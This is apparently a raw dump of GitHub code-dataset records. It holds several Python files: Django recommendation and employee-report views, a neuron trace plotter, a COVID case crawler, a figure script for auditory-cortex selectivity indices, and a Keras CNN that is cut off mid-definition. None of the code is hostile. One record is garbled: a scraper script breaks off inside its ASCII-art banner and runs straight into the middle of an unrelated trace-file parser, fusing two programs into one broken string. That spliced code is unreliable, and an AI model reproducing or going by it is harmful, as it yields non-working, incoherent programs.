get_users_who_rate_the_most(most_rated_movies, n_users)\n return most_rated_movies\n \n \ndef bias_genre_rating_dataset(genre_ratings, score_limit_1, score_limit_2):\n biased_dataset = genre_ratings[((genre_ratings['avg_romance_rating'] < score_limit_1 - 0.2) & (genre_ratings['avg_scifi_rating'] > score_limit_2)) | ((genre_ratings['avg_scifi_rating'] < score_limit_1) & (genre_ratings['avg_romance_rating'] > score_limit_2))]\n biased_dataset = pd.concat([biased_dataset[:300], genre_ratings[:2]])\n biased_dataset = pd.DataFrame(biased_dataset.to_records())\n return biased_dataset\n\n'''\n if request.method == 'GET':\n cluster = request.GET.get('cluster', None)\n recommend = request.GET.get('recommend', None)\n con = sqlite3.connect(\"db.sqlite3\")\n cur = con.cursor()\n serializer = ''\n movieDb = Clustering.objects.all()\n movieDb.delete()\n if cluster :\n if cluster == '1' :\n #df = pd.read_sql(\"SELECT * From kmeans\" , con = con)\n cur.execute(\"select * from kmeans\")\n if cluster == '2' :\n #df = pd.read_sql(\"SELECT * From Hierarchical\", con = con)\n cur.execute(\"select * from Hierarchical\")\n if cluster == '3' : \n #df = pd.read_sql(\"SELECT * From EM\", con = con)\n cur.execute(\"select * from EM\")\n \n #print(df)\n rows = cur.fetchall()\n cnt = 0\n for row in rows:\n if(cnt == len(rows)-1):\n break\n userid = int(row[0])+2\n group = int(row[-1])\n profile = list(Profile.objects.filter(user_id = userid).values())\n print(profile[0])\n print(profile[0]['user_id'])\n\n Clustering(id = int(profile[0]['user_id']),occupation=profile[0]['occupation'], gender=profile[0]['gender'],age=int(profile[0]['age']),group=group ).save()\n cnt = cnt+1\n clusters = Clustering.objects.all()\n con.close()\n 
serializer = ClusteringSerializer(clusters, many=True)\n \n if recommend :\n\n return\n \n return Response(data=serializer.data, status=status.HTTP_200_OK)\n'''","repo_name":"jby3146/bigdata_movie-python-vue-","sub_path":"backend/api/views/recommend_views.py","file_name":"recommend_views.py","file_ext":"py","file_size_in_byte":10418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25676906697","text":"from bs4 import BeautifulSoup as bes\nimport requests, subprocess, pixeldrain, os\n\nclass kusonim:\n def indeed(self):\n self.judul = int(input(\"\"\"\n __ __ _\n / //_/_ _____ ___ ___ (_)_ _ ___\n / ,< / // (_- -1:\n # there's a comment, remove it, and then strip white space\n nextLine = nextLine[:commentInd].strip()\n else:\n # no comment, strip white space\n nextLine = nextLine.strip()\n \n return nextLine\n\n\n\n###############################################################################\ndef loadTraces(traceFile):\n \"\"\"\n load all the traces in traceFile into a dictionary object\n \"\"\"\n global _lineNum\n _lineNum = 0\n traces = []\n try:\n with open(traceFile, 'r') as fIn:\n # first get the number of traces\n line = _getNextLine(fIn)\n numTraces = int(line)\n \n # read in the header info for each trace\n for n in range(numTraces):\n _readTraceHeader(fIn, traces)\n \n # read in the data for each trace\n for trace in traces:\n # first just add a few extra fields to trace\n trace['fileName'] = traceFile\n trace['uniqueName'] = trace['name'] + '_' + traceFile\n # read in data\n _readTraceData(fIn, trace)\n \n except StandardError as err:\n sys.tracebacklimit = 0\n raise IOError('Error reading %s line %d: %s' % \\\n (traceFile, _lineNum, err.message))\n\n return traces\n\n\n\n###############################################################################\ndef _readTraceHeader(fIn, traces):\n \"\"\"\n read a header line from the file and add a new trace to traces and traceNames\n \"\"\"\n # get the next header line\n headerLine = _getNextLine(fIn)\n # split it into its four component parts (will work even if traceName has\n # white space)\n (traceName, units, numT, dT) = headerLine.rsplit(None, 3)\n # add to traces\n traces.append( {'name' : traceName, \\\n 'units' : units, \\\n 'numT' : int(numT), \\\n 'dT' : float(dT), \\\n 'data' : [] } )\n \n\n\n###############################################################################\ndef _readTraceData(fIn, trace):\n \"\"\"\n read the data corresponding to trace from fIn\n \"\"\"\n trace['data'] = \\\n [float(_getNextLine(fIn)) for n in range(trace['numT'])]\n\n\n\n###############################################################################\ndef saveTraces(traces, traceFile):\n \"\"\"\n save all the traces a dictionary object to traceFile\n \"\"\"\n with open(traceFile, 'w') as fOut:\n # write the number of traces\n fOut.write('# number of traces\\n')\n fOut.write('%d\\n' % len(traces))\n \n # write the header information\n fOut.write('# name units numT dt\\n')\n for traceName in traces:\n trace = traces[traceName]\n fOut.write('%s %s %d %g\\n' % \\\n (traceName, trace['units'], trace['numT'], trace['dT']))\n \n # write the trace data\n for traceName in traces:\n fOut.write('#%s\\n' % traceName)\n for val in traces[traceName]['data']:\n fOut.write('%g\\n' % val)\n\n\n\n###############################################################################\ndef plotTrace(trace, dupTraces=None, labelSize=30, titleSize=30, tickSize=24):\n \"\"\"\n plot the trace in a new figure\n 
\"\"\"\n (dT, tUnits) = scaleTraceTime(trace, 'ms')\n tFactor = dT / trace['dT']\n units = trace['units']\n \n # do any conversions to dT, tUnits based on tUnits and numT?\n t = [dT * n for n in range(trace['numT'])]\n \n xLabel = 'Time (%s)' % tUnits\n yLabel = '%s (%s)' % (trace['name'], units)\n\n if dupTraces:\n # first make overlay plot\n legendName = 'fileName' # or 'uniqueName'\n overlayFig = pyplot.figure()\n titleStr = trace['name'] + ' overlaid'\n for dupNum in range(len(dupTraces)):\n trace2 = dupTraces[dupNum]\n dT2 = trace2['dT'] * tFactor\n units2 = trace2['units']\n t2 = [dT2 * n for n in range(trace2['numT'])]\n plotXY(t2, trace2['data'], '-', color=getColor(dupNum+2), \\\n xLabel=xLabel, yLabel=yLabel, title=titleStr, \\\n legendLabel=trace2[legendName], figure=overlayFig, linewidth=2)\n \n titleStr = trace['name'] + ' overlaid'\n plotXY(t, trace['data'], '-', color=getColor(1), \\\n xLabel=xLabel, yLabel=yLabel, title=titleStr, \\\n legendLabel=trace[legendName], figure=overlayFig)\n pyplot.legend(loc=0)\n \n # make difference plots\n numDiff = 0\n diffFig = pyplot.figure()\n titleStr = trace['name'] + ' difference'\n for dupNum in range(len(dupTraces)):\n trace2 = dupTraces[dupNum]\n numDiff += 1\n traceDiff = [y2 - y for (y, y2) in zip(trace['data'], trace2['data'])]\n numT = min(trace['numT'], trace2['numT'])\n plotXY(t[:numT], traceDiff, '-', color=getColor(dupNum + 2), \\\n xLabel=xLabel, yLabel=yLabel, title=titleStr, \\\n legendLabel=trace2[legendName], figure=diffFig)\n if numDiff > 0:\n pyplot.legend(loc=0)\n else:\n plotXY(t, trace['data'], 'k-', \\\n xLabel=xLabel, yLabel=yLabel, title=trace['name'])\n\n\n\n###############################################################################\ndef scaleTraceTime(originalTrace, originalUnits):\n \"\"\"\n return dT and tUnits in a convenient unit\n \"\"\"\n dT = originalTrace['dT']\n numT = originalTrace['numT']\n tFinal = dT * (numT - 1)\n \n upConvert = \\\n { \\\n 'ns' : {'unit': 'us', 'factor' : 1000}, \\\n 'μs' : {'unit': 'ms', 'factor' : 1000}, \\\n 'us' : {'unit': 'ms', 'factor' : 1000}, \\\n 'ms' : {'unit': 's', 'factor' : 1000}, \\\n 's' : {'unit': 'm', 'factor' : 60},\\\n 'm' : {'unit': 'h', 'factor' : 60},\\\n 'h' : {'unit': 'd', 'factor' : 24}\\\n }\n downConvert = \\\n { \\\n 'us' : {'unit': 'ns', 'factor' : 1000}, \\\n 'μs' : {'unit': 'ns', 'factor' : 1000}, \\\n 'ms' : {'unit': 'us', 'factor' : 1000}, \\\n 's' : {'unit': 'ms', 'factor' : 1000}, \\\n 'm' : {'unit': 's', 'factor' : 60},\\\n 'h' : {'unit': 'm', 'factor' : 60},\\\n 'd' : {'unit': 'h', 'factor' : 24}\\\n }\n \n tUnits = originalUnits\n if tFinal >= 1:\n while tUnits in upConvert:\n # upconvert as long as the result leaves tFinal >= 1\n factor = upConvert[tUnits]['factor']\n tFinal = tFinal / factor\n if tFinal >= 1:\n dT = dT / factor\n tUnits = upConvert[tUnits]['unit']\n else:\n break\n else:\n while tUnits in downConvert and tFinal < 1:\n # downconvert as long as tFinal < 1\n factor = downConvert[tUnits]['factor']\n tFinal = tFinal * factor\n dT = dT * factor\n tUnits = downConvert[tUnits]['unit']\n return (dT, tUnits) \n\n\n\n###############################################################################\ndef getColor(colorNum):\n colors = [ \\\n (0, 0, 0 ), \\\n (0, 0, 255), \\\n (255, 0, 0 ), \\\n (0, 255, 0 ), \\\n (255, 0, 182), \\\n (0, 83, 0 ), \\\n (255, 211, 0 ), \\\n (0, 159, 255), \\\n (154, 77, 66 ), \\\n (0, 255, 190), \\\n (120, 63, 193), \\\n (31, 150, 152), \\\n (255, 172, 253), \\\n (177, 204, 113), \\\n (241, 8, 92 ), \\\n 
(254, 143, 66 ), \\\n (221, 0, 255), \\\n (32, 26, 1 ), \\\n (114, 0, 85 ), \\\n (118, 108, 149), \\\n (2, 173, 36 ), \\\n (200, 255, 0 ), \\\n (136, 108, 0 ), \\\n (255, 183, 159), \\\n (133, 133, 103), \\\n (161, 3, 0 ), \\\n (20, 249, 255), \\\n (0, 71, 158), \\\n (220, 94, 147), \\\n (147, 212, 255), \\\n (0, 76, 255) \\\n ]\n # get desired color and scale it to float in interval [0, 1]\n return tuple([ c / 255.0 for c in colors[colorNum] ])\n\n\n\n###############################################################################\ndef findDuplicateTraces(traces):\n \n def _isDup(t1, t2):\n if t1['name'] == t2['name'] or \\\n t1['name'] + '_0' == t2['name'] or \\\n t1['name'] == t2['name'] + '_0':\n return True\n else:\n return False\n \n duplicates = []\n noDupTraces = []\n while traces:\n trace = traces.pop(0)\n dups = [t for t in traces if _isDup(t, trace)]\n for t in dups:\n traces.remove(t)\n noDupTraces.append(trace)\n duplicates.append(dups)\n \n return (noDupTraces, duplicates)\n\n\n\n###############################################################################\ndef plotTraces(traces):\n (traces, duplicates) = findDuplicateTraces(traces)\n \n for (trace, dups) in zip(traces, duplicates):\n # plot each trace\n plotTrace(trace, dups)\n \n # wait until figures are closed\n pyplot.show()\n\n\n\n###############################################################################\ndef _parseArguments():\n arguments = sys.argv\n if len(arguments) < 2:\n print(_usageStr)\n sys.tracebacklimit = 1\n raise TypeError('Incorrect number of arguments.')\n\n traceFiles = arguments[1:]\n \n return traceFiles\n\n\n \n###############################################################################\nif __name__ == \"__main__\":\n traceFiles = _parseArguments()\n \n # load all the traces\n traces = []\n for traceFile in traceFiles:\n traces.extend( loadTraces(traceFile) )\n \n plotTraces(traces)\n\n sys.exit(0)\n","repo_name":"TedBrookings/fitneuron","sub_path":"scripts/neuron_plot_trace.py","file_name":"neuron_plot_trace.py","file_ext":"py","file_size_in_byte":9829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34122984946","text":"from django.contrib.auth.models import User\nfrom django.urls import reverse_lazy\nfrom django.views.generic import UpdateView, DeleteView, CreateView, TemplateView\nfrom django.views.generic.list import ListView\nfrom apps.funcionarios.models import Funcionario\nimport io\nfrom django.http import FileResponse, HttpResponse\nfrom reportlab.pdfgen import canvas\nimport xhtml2pdf.pisa as pisa\nfrom django.template.loader import get_template\nfrom django.views import View\n\nclass FuncionariosList(ListView):\n model = Funcionario\n # paginate_by = 10\n\n def get_queryset(self):\n #pegar o is do usuario\n #pelo id buscar a empresa\n user_id = self.request.user.id\n empresa_logada = Funcionario.objects.get(user=user_id).empresa_id\n return Funcionario.objects.filter(empresa=empresa_logada)\n\nclass FuncionarioEdit(UpdateView):\n model = Funcionario\n fields = ['nome', 'departamentos']\n\nclass FuncionarioDelete(DeleteView):\n model = Funcionario\n #reverse_lazy não deixa concatenar a url\n success_url = reverse_lazy('list_funcionarios')\n\nclass FuncionarioCreate(CreateView):\n model = Funcionario\n fields = ['nome', 'departamentos']\n\n def form_valid(self, form):\n funcionario = form.save(commit=False)\n username = ''\n for func in funcionario.nome.split(' '):\n username = username + func\n funcionario.empresa = 
self.request.user.funcionario.empresa\n funcionario.user = User.objects.create(username=username)\n funcionario.save()\n\n return super(FuncionarioCreate, self).form_valid(form)\n\ndef relatorio_funcionarios(request):\n # Create a file-like buffer to receive PDF data.\n response = HttpResponse(content_type='application/pdf')\n #Content-Disposition serve para baixar o arquivo no pc quando clicado\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n\n buffer = io.BytesIO()\n # Create the PDF object, using the buffer as its \"file.\"\n p = canvas.Canvas(buffer)\n\n #escrever no relatorio usando coordenadas x, y\n p.drawString(200, 810, \"Relatório de Funcionários.\")\n p.drawString(0, 800, \"_\" * 200)\n\n funcionarios = Funcionario.objects.filter(empresa=request.user.funcionario.empresa)\n str = 'Nome: %s | Hora Extra: %f'\n y = 750\n for funcionario in funcionarios:\n p.drawString(10, y, str%(funcionario.nome, funcionario.total_horas_extra))\n y -= 20\n p.showPage()\n p.save()\n\n pdf = buffer.getvalue()\n buffer.close()\n response.write(pdf)\n\n return response\n\n\nclass Render:\n\n @staticmethod\n def render(path: str, params: dict, filename: str):\n template = get_template(path)\n html = template.render(params)\n response = io.BytesIO()\n pdf = pisa.pisaDocument(\n io.BytesIO(html.encode('UTF-8')), response)\n if not pdf.err:\n response = HttpResponse(\n response.getvalue(), content_type='application/pdf')\n response['Content-Disposition'] = 'attachment;filename=%s.pdf' %filename\n return response\n else:\n return HttpResponse(\"Error Rendering PDF\", status=400)\n\nclass Pdf(View):\n\n def get(self, request):\n params = {\n 'today': 'Variavel today',\n 'sales': 'Variavel sales',\n 'request': request\n }\n return Render.render('funcionarios/relatorio.html', params, 'myfile')\n\n\nclass PdfDebug(TemplateView):\n template_name = 'funcionarios/relatorio.html'\n","repo_name":"gelhen/gestao_rh","sub_path":"apps/funcionarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25955227553","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time, requests, re, os\n\n\ndef getNDHNumbers(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n \n remove_array = [\"\", \"\", \"\", \"\", \" \", \"\\n\"]\n \n num_pattern_T = re.compile(r\"Infektionen:([0-9]{1,})\")\n num_pattern_R = re.compile(r\"gelten als genesen:([0-9]{1,})\")\n num_pattern_D = re.compile(r\"[vV]erstorben:([0-9]{1,})\")\n num_pattern_H = re.compile(r\"stationär\\sbehandelt:([0-9]{1,})\")\n \n try:\n r = requests.get(url, headers=headers, allow_redirects=True, timeout=5.0)\n s = r.text\n \n for entry in remove_array:\n s = s.replace(entry, \"\")\n \n ps1 = num_pattern_T.findall( s )\n ps2 = num_pattern_R.findall( s )\n ps3 = num_pattern_D.findall( s )\n ps4 = num_pattern_H.findall( s )\n \n num_t = int(ps1[0]) if (len(ps1) >= 1) else -1\n num_r = int(ps2[0]) if (len(ps2) >= 1) else -1\n num_d = int(ps3[0]) if (len(ps3) >= 1) else -1\n num_h = int(ps4[0]) if (len(ps4) >= 1) else -1\n num_s = -1\n \n return (num_t, num_r, num_d, num_h, num_s)\n \n except:\n return False \n\n\nif __name__ == \"__main__\":\n \n DATAFILE = os.path.dirname(os.path.realpath(__file__)) + \"/../data/cases_ndh.csv\"\n URL = 'https://www.landratsamt-nordhausen.de/informationen-coronavirus.html'\n \n # do the request\n num_latest = getNDHNumbers(URL)\n \n if (num_latest != 
False) and (num_latest[0] > -1):\n \n # get old values\n with open(DATAFILE, 'r') as df:\n raw_data = df.read().splitlines()\n last_values = raw_data[-1].split(\",\")[1:6]\n \n # check for changes\n value_changed = False\n for i in enumerate(last_values):\n if ( int(i[1]) != num_latest[i[0]] ):\n if ( num_latest[i[0]] != -1 ):\n value_changed = True\n \n if value_changed:\n # write new csv data\n f = open(DATAFILE, 'a')\n f.write(\"%i,%i,%i,%i,%i,%i,%s\\n\" % (int(time.time()), num_latest[0], num_latest[1], num_latest[2], num_latest[3], num_latest[4], URL))\n f.close()\n","repo_name":"micb25/corona-jena","sub_path":"crawler/crawler_ndh.py","file_name":"crawler_ndh.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"38456916469","text":"'''\nFigure of firing rate based selectivity indices for VOT and FT\n'''\nimport os\nimport sys\nimport studyparams\nimport figparams\nimport numpy as np\nimport pandas as pd\nfrom jaratoolbox import settings\nfrom jaratoolbox import extraplots\nfrom scipy import stats\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nfrom importlib import reload\nreload(studyparams)\n\nSAVE_FIGURE = 1\noutputDir = 'C:\\\\Users\\\\jenny\\\\tmp'\nFIGNAME = 'selectivityIndices'\nfigFormat = 'svg' # 'pdf' or 'svg'\nfigSize = [6, 4] # In inches\n\n# -- Load data --\nfigDataFile = 'data_selectivity_indices.npz'\nfigDataDir = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME, FIGNAME)\nfigDataFullPath = os.path.join(figDataDir, figDataFile)\nfigData = np.load(figDataFullPath, allow_pickle = True)\n#databaseDir = os.path.join(settings.DATABASE_PATH, studyparams.STUDY_NAME)\n#dbPath = os.path.join(databaseDir, 'fulldb_paspeech_speech_tuning_allcells.h5')\n#audCtxAreas = ['Primary auditory area','Dorsal auditory area', 'Ventral auditory area']\n\n\nPANELS = [0] # Plot panel i if PANELS[i]==1\n\nfontSizeLabels = figparams.fontSizeLabels\nfontSizeTicks = figparams.fontSizeTicks\nfontSizePanel = figparams.fontSizePanel\n\nlabelPosX = [0.07, 0.48, 0.7] # Horiz position for panel labels\nlabelPosY = [0.9, 0.48] # Vert position for panel labels\n\n# -- Assigned colors (defined in figparams) --\naudPColor = figparams.colors['audP']\naudDColor = figparams.colors['audD']\naudVColor = figparams.colors['audV']\n\n\nbestFtSIbyArea = []\nbestVotSIbyArea = []\nspeechResponsiveByArea = []\nexcludeCellsbyArea = []\n\nfor indArea, thisArea in enumerate(figData['audCtxAreas']):\n bestFtSIbyArea.append(figData['bestSelectivityIndexFt'][figData['recordingAreaName'] == thisArea])\n bestVotSIbyArea.append(figData['bestSelectivityIndexVot'][figData['recordingAreaName'] == thisArea])\n speechResponsiveByArea.append(figData['speechResponsive'][figData['recordingAreaName'] == thisArea])\n excludeCellsbyArea.append(figData['excludeCells'][figData['recordingAreaName']==thisArea])\n\n\n## exclude low spike count cells\nfor indArea, thisArea in enumerate(figData['audCtxAreas']):\n bestFtSIbyArea[indArea] = bestFtSIbyArea[indArea][~excludeCellsbyArea[indArea]]\n bestVotSIbyArea[indArea] = bestVotSIbyArea[indArea][~excludeCellsbyArea[indArea]]\n speechResponsiveByArea[indArea] = speechResponsiveByArea[indArea][~excludeCellsbyArea[indArea]]\n\n\n# -- if group difference, test individual comparisons:\n## all cells:\nif figData['pValKruskalBestVOT'] < 0.05:\n ustat, pValmannU_votAudPvsAudD = stats.mannwhitneyu(bestVotSIbyArea[0], bestVotSIbyArea[1])\n ustat, 
pValmannU_votAudPvsAudV = stats.mannwhitneyu(bestVotSIbyArea[0], bestVotSIbyArea[2])\n    ustat, pValmannU_votAudDvsAudV = stats.mannwhitneyu(bestVotSIbyArea[1], bestVotSIbyArea[2])\n\nif figData['pValKruskalBestFT'] < 0.05:\n    ustat, pValmannU_ftAudPvsAudD = stats.mannwhitneyu(bestFtSIbyArea[0], bestFtSIbyArea[1])\n    ustat, pValmannU_ftAudPvsAudV = stats.mannwhitneyu(bestFtSIbyArea[0], bestFtSIbyArea[2])\n    ustat, pValmannU_ftAudDvsAudV = stats.mannwhitneyu(bestFtSIbyArea[1], bestFtSIbyArea[2])\n\n## responsive cells\nif figData['pValKruskalBestVOT'] < 0.05:\n    ustat, pValmannU_votAudPvsAudD = stats.mannwhitneyu(bestVotSIbyArea[0][speechResponsiveByArea[0]],\n                                                        bestVotSIbyArea[1][speechResponsiveByArea[1]])\n    ustat, pValmannU_votAudPvsAudV = stats.mannwhitneyu(bestVotSIbyArea[0][speechResponsiveByArea[0]],\n                                                        bestVotSIbyArea[2][speechResponsiveByArea[2]])\n    ustat, pValmannU_votAudDvsAudV = stats.mannwhitneyu(bestVotSIbyArea[1][speechResponsiveByArea[1]],\n                                                        bestVotSIbyArea[2][speechResponsiveByArea[2]])\n\nif figData['pValKruskalBestFT'] < 0.05:\n    ustat, pValmannU_ftAudPvsAudD = stats.mannwhitneyu(bestFtSIbyArea[0][speechResponsiveByArea[0]],\n                                                       bestFtSIbyArea[1][speechResponsiveByArea[1]])\n    ustat, pValmannU_ftAudPvsAudV = stats.mannwhitneyu(bestFtSIbyArea[0][speechResponsiveByArea[0]],\n                                                       bestFtSIbyArea[2][speechResponsiveByArea[2]])\n    ustat, pValmannU_ftAudDvsAudV = stats.mannwhitneyu(bestFtSIbyArea[1][speechResponsiveByArea[1]],\n                                                       bestFtSIbyArea[2][speechResponsiveByArea[2]])\n\n\n#fig1 = plt.gcf()\n#fig1.clf()\nfig1 = plt.figure()\ngsMain = gridspec.GridSpec(3,2)\ngsMain.update(left=0.08, right=0.98, top=0.95, bottom=0.1, wspace=0.4, hspace=0.4)\n\nbins = np.arange(0,1,0.025)\nyMax = 15\n\n## -- Plot VOT results --\nax1 = plt.subplot(gsMain[0, 0])\nplt.hist(bestVotSIbyArea[1][speechResponsiveByArea[1]], bins = bins, color = audDColor)\nplt.ylim([0, yMax])\naudD_votmedian = np.nanmedian(bestVotSIbyArea[1][speechResponsiveByArea[1]])\n#plt.plot([audD_votmedian, audD_votmedian], [0,yMax], color = 'k', ls = '--')\nax1.text(audD_votmedian, yMax-2, 'V', fontsize = fontSizeLabels)\n# ax.text(starsXvals, yPos, starMarker, fontsize=fontSize, va='center', ha='center', clip_on=False)\nplt.title('VOT Selectivity', fontsize=fontSizeLabels, fontweight='bold')\nax1.annotate(f'med = {np.round(audD_votmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n             fontSizeTicks)\n\nax2 = plt.subplot(gsMain[1, 0], sharex = ax1)\nplt.hist(bestVotSIbyArea[0][speechResponsiveByArea[0]], bins = bins, color = audPColor)\nplt.ylim([0, yMax])\naudP_votmedian = np.nanmedian(bestVotSIbyArea[0][speechResponsiveByArea[0]])\n#plt.plot([audP_votmedian, audP_votmedian], [0,yMax], color = 'k', ls = '--')\nax2.text(audP_votmedian, yMax-2, 'V', fontsize = fontSizeLabels)\nplt.ylabel('Cell Count', fontsize = fontSizeTicks)\nax2.annotate(f'med = {np.round(audP_votmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n             fontSizeTicks)\n\nax3 = plt.subplot(gsMain[2, 0], sharex = ax1)\nplt.hist(bestVotSIbyArea[2][speechResponsiveByArea[2]], bins = bins, color = audVColor)\nplt.ylim([0, yMax])\naudV_votmedian = np.nanmedian(bestVotSIbyArea[2][speechResponsiveByArea[2]])\n#plt.plot([audV_votmedian, audV_votmedian], [0,yMax], color = 'k', ls = '--')\nax3.text(audV_votmedian, yMax-2, 'V', fontsize = fontSizeLabels)\n#ax3.annotate(\"\", xy = (audV_votmedian, yMax-2), xycoords = 'data', arrowprops = dict(arrowstyle = \"-|>\", connectionstyle = \"angle3, angleA = 0, angleB=90\"))\nplt.xlabel('VOT Selectivity Index', fontsize=fontSizeTicks)\nax3.annotate(f'med = {np.round(audV_votmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n             fontSizeTicks)
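\n\n# --- Editorial sketch (added by the editor; not part of the original analysis).\n# The three pairwise Mann-Whitney tests above are reported without a\n# multiple-comparison correction; a Bonferroni-adjusted report for the three\n# VOT comparisons would look like this (0.05 family-wise alpha is an assumption):\nif figData['pValKruskalBestVOT'] < 0.05:\n    alphaBonf = 0.05 / 3  # three planned pairwise comparisons\n    print(f'VOT pairwise p-values (Bonferroni alpha = {alphaBonf:.3f}):',\n          pValmannU_votAudPvsAudD, pValmannU_votAudPvsAudV, pValmannU_votAudDvsAudV)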
\n\n# -- Plot FT results --\nax4 = plt.subplot(gsMain[0, 1])\nplt.hist(bestFtSIbyArea[1][speechResponsiveByArea[1]], bins = bins, color = audDColor)\nplt.ylim([0, yMax])\naudD_ftmedian = np.nanmedian(bestFtSIbyArea[1][speechResponsiveByArea[1]])\n#plt.plot([audD_ftmedian, audD_ftmedian], [0,yMax], color = 'k', ls = '--')\nax4.text(audD_ftmedian, yMax-2, 'V', fontsize = fontSizeLabels)\nplt.title('FT Selectivity', fontsize=fontSizeLabels, fontweight='bold')\nax4.annotate(f'med = {np.round(audD_ftmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n             fontSizeTicks)\n\nax5 = plt.subplot(gsMain[1, 1], sharex = ax1)\nplt.hist(bestFtSIbyArea[0][speechResponsiveByArea[0]], bins = bins, color = audPColor)\nplt.ylim([0, yMax])\naudP_ftmedian = np.nanmedian(bestFtSIbyArea[0][speechResponsiveByArea[0]])\n#plt.plot([audP_ftmedian, audP_ftmedian], [0,yMax], color = 'k', ls = '--')\nax5.text(audP_ftmedian, yMax-2, 'V', fontsize = fontSizeLabels)\nax5.annotate(f'med = {np.round(audP_ftmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n             fontSizeTicks)\n\nax6 = plt.subplot(gsMain[2, 1], sharex = ax1)\nplt.hist(bestFtSIbyArea[2][speechResponsiveByArea[2]], bins = bins, color = audVColor)\nplt.ylim([0, yMax])\naudV_ftmedian = np.nanmedian(bestFtSIbyArea[2][speechResponsiveByArea[2]])\n#plt.plot([audV_ftmedian, audV_ftmedian], [0,yMax], color = 'k', ls = '--')\nax6.text(audV_ftmedian, yMax-2, 'V', fontsize = fontSizeLabels)\nplt.xlabel('FT Selectivity Index', fontsize=fontSizeTicks)\nax6.annotate(f'med = {np.round(audV_ftmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n             fontSizeTicks)\n\nax1.annotate('AudD', xy=(0.48, 0.82), xycoords='figure fraction', fontsize=fontSizeLabels,\n             fontweight='bold')\nax2.annotate('AudP', xy=(0.48, 0.51), xycoords='figure fraction', fontsize=fontSizeLabels,\n             fontweight='bold')\nax3.annotate('AudV', xy=(0.48, 0.20), xycoords='figure fraction', fontsize=fontSizeLabels,\n             fontweight='bold')\n\nplt.show()\n\nif SAVE_FIGURE:\n    extraplots.save_figure(FIGNAME, figFormat, figSize, outputDir)\n    #extraplots.save_figure('selectivityIndices_dontExcludelowSpikers', figFormat, figSize, outputDir)\n","repo_name":"sjara/jarapubs","sub_path":"2022paspeech/old_figure_speech_selectivity.py","file_name":"old_figure_speech_selectivity.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21720831295","text":"from pandas import Series,DataFrame\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom numpy import newaxis\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten, BatchNormalization, Dropout, LeakyReLU, PReLU, MaxoutDense,ZeroPadding2D\r\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint,ReduceLROnPlateau\r\nfrom keras import metrics,regularizers\r\nimport keras.backend as K\r\nimport keras\r\nimport tensorflow\r\nimport h5py\r\nimport sys\r\ntestDATA=sys.argv[1]\r\nfilepath='best_model.h5'\r\ncallbacks = [\r\n    EarlyStopping(monitor='val_acc', patience=30, verbose=1),\r\n    ModelCheckpoint(filepath, monitor='val_acc', save_best_only=True, verbose=1),\r\n    ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=0, mode='auto', epsilon=0.0001, cooldown=0, min_lr=0)\r\n]\r\n\r\nDATA = 
np.genfromtxt(testDATA,delimiter=',',dtype=None)\r\nDATA=DATA[1:,:]\r\n\r\ndata=np.zeros((len(DATA),48,48,1))\r\nfor i in range(len(DATA)):\r\n\tdata[i,:,:,0]=np.fromstring(DATA[i,1], dtype=int, sep=' ').reshape((48,48))\r\n\tif np.std(data[i,:,:,0]) !=0:\r\n\t\tdata[i,:,:,0]=data[i,:,:,0]/np.std(data[i,:,:,0])\r\n\r\n\r\nlabel=np.zeros((len(DATA),7))\r\nlabel_buf=DATA[:,0].astype(int)\r\nfor i in range(len(DATA)):\r\n\tlabel[i,label_buf[i]]=1\r\n\r\n\r\nDROPOUT=0.3\r\n\r\nmodel = Sequential()\r\n\r\nmodel.add(ZeroPadding2D((1,1),input_shape=(48,48,1)))\r\nmodel.add(Conv2D(32,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(32,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(MaxPooling2D((2,2),strides=(2,2)))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(MaxPooling2D((2,2),strides=(2,2)))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 